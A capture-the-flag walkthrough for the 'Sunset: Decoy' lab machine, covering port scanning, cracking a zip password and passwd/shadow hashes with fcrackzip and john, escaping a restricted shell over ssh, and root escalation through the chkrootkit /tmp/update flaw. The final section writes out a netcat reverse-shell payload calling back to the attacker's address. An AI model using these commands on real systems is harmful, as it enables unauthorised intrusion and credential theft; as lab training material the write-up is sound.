Sunset: Decoy Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.9 -vv

Port 80 is open, and the web root serves a single file, save.zip:

The archive is password protected, but a dictionary attack with fcrackzip recovers the password (-u makes it verify each candidate with unzip so false positives are discarded): "fcrackzip -u -D -p /root/pass/rockyou.txt save.zip"

Unzipping it, we get:

The archive contains a passwd file and a shadow file. We merge them with "unshadow" (part of the John the Ripper suite) so that each passwd entry carries its hash, then crack the result with john:

unshadow passwd shadow > passlist.txt

john --wordlist=/root/pass/rockyou.txt passlist.txt

server           (296640a3b825115a47b68fc44501c828)

john prints the cracked password followed by the username in parentheses, so the password "server" belongs to the account 296640a3b825115a47b68fc44501c828.
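To make the unshadow step visible, here is an added example (not from the original walkthrough) that reimplements what "unshadow passwd shadow" does with awk: the "x" placeholder in the second field of each passwd line is replaced by the hash from the matching shadow entry, which is the format john reads. The sample entries in the usage below are constructed, with placeholder hashes that are not from the target.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough: a minimal
# reimplementation of `unshadow` so the merge step is visible.
#
# unshadow_merge PASSWD SHADOW
#   Prints each passwd line with field 2 ("x") replaced by the hash field
#   from the shadow file. Lines with no shadow entry are printed unchanged;
#   locked accounts ("*" or "!" hashes) are copied as-is and john skips them.
unshadow_merge() {
    passwd=$1
    shadow=$2
    # First pass (NR == FNR) reads the shadow file into an array keyed by
    # username; second pass rewrites field 2 of every passwd line that has a
    # shadow entry and prints the record with ":" as the output separator.
    awk -F: -v OFS=: '
        NR == FNR { hash[$1] = $2; next }
        ($1 in hash) { $2 = hash[$1] }
        { print }
    ' "$shadow" "$passwd"
}

# Usage (constructed sample files, placeholder hashes):
#   printf '%s\n' 'alice:x:1000:1000:Alice:/home/alice:/bin/rbash' > passwd
#   printf '%s\n' 'alice:$6$salt$placeholder:18000:0:99999:7:::' > shadow
#   unshadow_merge passwd shadow > passlist.txt
#   john --wordlist=/root/pass/rockyou.txt passlist.txt
```

The merged file is what john needs because the shadow file alone has no usable login shell or UID fields and the passwd file alone has no hashes; john reads the crypt-style hash out of field 2 and reports the match as password (username), exactly as in the output above.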

We log in over ssh with these credentials. They work, but the account lands in a restricted shell with a very limited set of commands. Asking sshd for "-t /bin/rbash" did not help; what worked was "-t bash --noprofile", which starts a normal bash on a tty and skips the login profile that applies the restrictions:

ssh 296640a3b825115a47b68fc44501c828@192.168.1.9 -t "bash --noprofile"

The PATH is still minimal, so to read user.txt we call cat by its full path: "/usr/bin/cat user.txt"

There is also a file honeypot.decoy; running it gives a menu of options:

Option 8 is the only one that looks useful, since it lets us check for running services:

I transferred pspy32 to the target machine and ran it, and we can see a lot of "chkrootkit" processes being spawned, i.e. chkrootkit is run repeatedly from a scheduled job:

This is the well-known chkrootkit privilege escalation (CVE-2014-0476): vulnerable versions execute /tmp/update with the privileges of the scan, so when chkrootkit is run from a root cron job, whatever we place at /tmp/update is run as root. From /tmp we create the payload, a script that connects back to our machine:

echo '#!/bin/bash' > update

echo '/usr/bin/nc -e /bin/sh 192.168.1.11 4444' >> update

chmod 777 update

With a listener running on our machine ("nc -lvnp 4444"), we wait for the next chkrootkit run, and we get a reverse shell on port 4444 with the privileges of the chkrootkit process, root. Note that "nc -e" needs a netcat build that supports it (traditional or GNU netcat); the OpenBSD variant does not have the flag.
